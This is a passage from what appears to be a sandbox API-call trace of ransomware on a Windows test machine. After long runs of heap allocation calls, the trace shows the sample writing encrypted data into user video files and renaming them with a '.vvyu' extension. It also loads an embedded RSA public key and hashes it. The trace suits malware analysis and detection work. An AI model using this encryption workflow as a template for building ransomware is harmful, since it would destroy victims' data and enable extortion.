(HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3638 [0202.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0202.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3620 [0202.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0202.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0202.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0202.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0202.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0202.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0202.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0202.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3638 | out: hHeap=0x620000) returned 1 [0202.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3620 | out: hHeap=0x620000) returned 1 [0202.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3680 | out: hHeap=0x620000) returned 1 [0202.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0202.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0202.335] GetCurrentThreadId () returned 0x66c [0202.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0202.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea91f8 [0202.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0202.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0202.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0202.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.336] GetCurrentThreadId () returned 0x66c [0202.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0202.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0202.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0202.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0202.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0202.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3680 [0202.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0202.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0202.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0202.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3620 [0202.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0202.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0202.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0202.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0202.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3638 [0202.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0202.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0202.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0202.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3608 [0202.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0202.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3698 [0202.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0202.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3668 [0202.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3650 [0202.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36b0 [0202.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3650 | out: hHeap=0x620000) returned 1 [0202.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3650 [0202.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3668 | out: hHeap=0x620000) returned 1 [0202.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0202.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0202.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0202.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3620 | out: hHeap=0x620000) returned 1 [0202.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3620 [0202.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0202.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3680 | out: hHeap=0x620000) returned 1 [0202.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0202.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36b0 | out: hHeap=0x620000) returned 1 [0202.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0202.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0202.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0202.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3620 | out: hHeap=0x620000) returned 1 [0202.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0202.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0202.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0202.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0202.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0202.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0202.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0202.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0202.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3650 | out: hHeap=0x620000) returned 1 [0202.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3698 | out: hHeap=0x620000) returned 1 [0202.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3638 | out: hHeap=0x620000) returned 1 [0202.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3608 | out: hHeap=0x620000) returned 1 [0202.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0202.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0202.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0202.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35f0 | out: hHeap=0x620000) returned 1 [0202.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1ac8 | out: hHeap=0x620000) returned 1 [0202.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0202.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0202.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0202.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0202.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0202.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0202.354] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0xaa11, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0xaa11, lpOverlapped=0x0) returned 1 [0202.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0202.355] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xaa16, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.355] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0202.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0202.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0202.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0202.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0202.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.357] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0202.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0202.357] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0202.357] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0202.357] CloseHandle (hObject=0x510) returned 1 [0202.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0202.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.359] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\I8OBTvHhmB.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\i8obtvhhmb.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\I8OBTvHhmB.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\i8obtvhhmb.swf.vvyu")) returned 1 [0202.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.362] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0202.365] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49b79aa0, ftCreationTime.dwHighDateTime=0x1d8a409, ftLastAccessTime.dwLowDateTime=0x6b21d7e0, ftLastAccessTime.dwHighDateTime=0x1d8a5ea, ftLastWriteTime.dwLowDateTime=0x6b21d7e0, ftLastWriteTime.dwHighDateTime=0x1d8a5ea, nFileSizeHigh=0x0, nFileSizeLow=0x694b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kvyEO7pECdl1BR27XVAc.mkv", cAlternateFileName="KVYEO7~1.MKV")) returned 1 [0202.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0202.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.366] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\kvyEO7pECdl1BR27XVAc.mkv") returned=".mkv" [0202.366] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\kvyEO7pECdl1BR27XVAc.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\kvyeo7pecdl1br27xvac.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0202.366] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=26955) returned 1 [0202.366] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0202.370] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x6925, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.370] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0202.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.373] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.373] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x694b, lpOverlapped=0x0) returned 1 [0202.374] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0202.374] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.374] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.374] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0202.375] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0202.375] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0202.375] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0202.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0202.376] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0202.376] GetLastError () returned 0x0 [0202.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.376] GetLastError () returned 0x0 [0202.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.376] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0202.376] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0202.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.377] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0202.377] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0202.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.377] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0202.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6950) returned 0x2ea99b0 [0202.378] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0202.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0202.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 